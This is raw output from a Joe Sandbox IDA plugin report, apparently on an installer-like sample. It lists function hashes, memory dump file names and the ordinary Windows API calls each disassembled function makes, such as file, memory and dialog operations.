                                                    • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                    • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                    • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                    • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
Memory Dump Source: same dump set as the first record above
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                    • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                    • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                    • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
Memory Dump Source: same dump set as the first record above
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                    • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                    • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                    • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
Memory Dump Source: same dump set as the first record above
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                    • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                    • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                    • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                    APIs
                                                    • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                    • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocFree
                                                    • String ID:
                                                    • API String ID: 3394109436-0
                                                    • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                    • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                    • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                    • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                    APIs
                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                    • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                    • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                    • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCreate
                                                    • String ID:
                                                    • API String ID: 415043291-0
                                                    • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                    • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                    • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                    • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                    • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                    • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                    • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                    APIs
                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                    • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                    • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                    • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                    APIs
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                    • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                    • String ID:
                                                    • API String ID: 4115351271-0
                                                    • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                    • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                    • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                    • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                    APIs
                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                    • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                    • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                    • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                    • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                    • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                    • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                    APIs
                                                    • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                    • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                    • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                    • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                    • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                    • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                    • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                    • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                    • DeleteObject.GDI32(?), ref: 00404A79
                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                    • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                    • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                    • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                    • ShowWindow.USER32(00000000), ref: 00404F5B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                    • String ID: $ @$M$N
                                                    • API String ID: 1638840714-3479655940
                                                    • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                    • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                    • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                    • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                    • SetWindowTextW.USER32(?,?), ref: 00404583
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                    • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                    • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                      • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                      • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                    • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                    • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                    • String ID: 82D$@%F$@rD$A
                                                    • API String ID: 3347642858-1086125096
                                                    • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                    • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                    • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
